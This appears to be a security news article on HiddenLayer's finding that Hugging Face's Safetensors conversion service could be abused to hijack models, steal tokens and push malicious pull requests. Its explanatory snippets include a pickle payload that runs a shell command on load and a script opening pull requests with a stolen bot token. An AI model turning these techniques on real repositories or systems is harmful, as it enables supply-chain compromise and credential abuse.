AI Models Could Be Hijacked via This Hugging Face Vulnerability – Security Worries Pile Onto Broader AI Concerns
There is a way to abuse the Hugging Face Safetensors conversion tool to hijack AI models and conduct supply chain attacks.
That is according to security researchers at HiddenLayer, who discovered the flaw and published their findings last week, The Hacker News reports.
For the uninitiated, Hugging Face is a collaboration platform where software developers can host and collaborate on any number of pre-trained machine learning models, datasets, and applications.
Changing a commonly used model
Safetensors is Hugging Face’s format for securely storing tensors; the platform also offers a conversion service that lets users convert their PyTorch models to Safetensors via a pull request.
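To see why that conversion path is sensitive, consider what a conversion roughly involves: loading the PyTorch weights (a pickle file) and re-saving them in the Safetensors format. The sketch below is a simplified, hypothetical illustration of that flow, not the code of Hugging Face’s actual service; the key point is that torch.load() deserializes a pickle, which can execute code embedded in an untrusted file.

import torch
from safetensors.torch import save_file

# Simplified sketch of a PyTorch -> Safetensors conversion (illustrative only;
# the official service's implementation differs).
state_dict = torch.load("pytorch_model.bin", map_location="cpu")  # unpickles the file

# Safetensors stores only raw tensor data plus a JSON header, with no
# executable content -- which is why the converted format is safe to load.
tensors = {name: t.contiguous() for name, t in state_dict.items()}
save_file(tensors, "model.safetensors")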
And that is where the problem lies: HiddenLayer found that the conversion service can be compromised. “It is possible to send malicious pull requests containing attacker-controlled data from the Hugging Face service to any repository on the platform, and to hijack models that are submitted through the conversion service.”
In practice, hijacking a model that is queued for conversion lets threat actors request changes to any Hugging Face repository while posing as the conversion bot.
Furthermore, hackers can exfiltrate the token of SFconvertbot – the official bot that submits the conversion pull requests – and use it to send malicious pull requests themselves.
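To make the risk concrete, here is a hypothetical sketch, assuming an attacker has already obtained the bot’s token, of how a pull request could be opened against an arbitrary repository with the standard huggingface_hub client. The token, repository name, and file names are all made up for illustration.

from huggingface_hub import HfApi, CommitOperationAdd

# Hypothetical illustration: a stolen bot token lets an attacker open pull
# requests that appear to come from the official conversion bot.
api = HfApi(token="hf_STOLEN_BOT_TOKEN")  # placeholder, not a real token
api.create_commit(
    repo_id="some-org/popular-model",  # any target repository (made up)
    operations=[CommitOperationAdd(
        path_in_repo="model.safetensors",
        path_or_fileobj="backdoored.safetensors",  # attacker-controlled weights
    )],
    commit_message="Convert weights to safetensors",
    create_pr=True,  # opens a pull request under the token owner's identity
)

Because the pull request arrives under the bot’s trusted identity, repository maintainers have little reason to scrutinize it.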
Consequently, they could tweak the model and plant neural backdoors – essentially a sophisticated supply chain attack.
“An attacker could run arbitrary code any time someone attempted to convert their model,” the researchers said. “Without any indication to the user themselves, their models could be hijacked upon conversion.”
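That arbitrary code execution stems from PyTorch’s pickle-based checkpoint format. The toy example below – benign, self-contained, and not HiddenLayer’s actual payload – shows how a pickled object can run a command the moment it is deserialized, which is effectively what happens when a conversion job loads a booby-trapped model.

import os
import pickle

class Payload:
    # __reduce__ tells pickle how to rebuild this object; returning a
    # callable plus arguments means that callable runs on deserialization.
    def __reduce__(self):
        return (os.system, ("echo code executed during unpickling",))

blob = pickle.dumps(Payload())
pickle.loads(blob)  # the echo command runs here, before any "model" exists

Safetensors was designed precisely to close this hole: its files contain only tensor data, so loading one cannot trigger code execution.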
Finally, when a user tries to convert a repository, the attack can result in their Hugging Face token being stolen, giving attackers access to otherwise restricted internal models and datasets. From there, they could compromise those assets in a variety of ways, including dataset poisoning.
In one hypothetical scenario, a user submits a conversion request for a public repository and unwittingly triggers the modification of a widely used model, resulting in a dangerous supply chain attack.
“Despite the best intentions to secure machine learning models in the Hugging Face ecosystem, the conversion service has proven to be vulnerable and has the potential to cause a widespread supply chain attack through the Hugging Face official service,” concluded the researchers.
“An attacker could gain a foothold in the container the service is running on and compromise any model converted by the service.”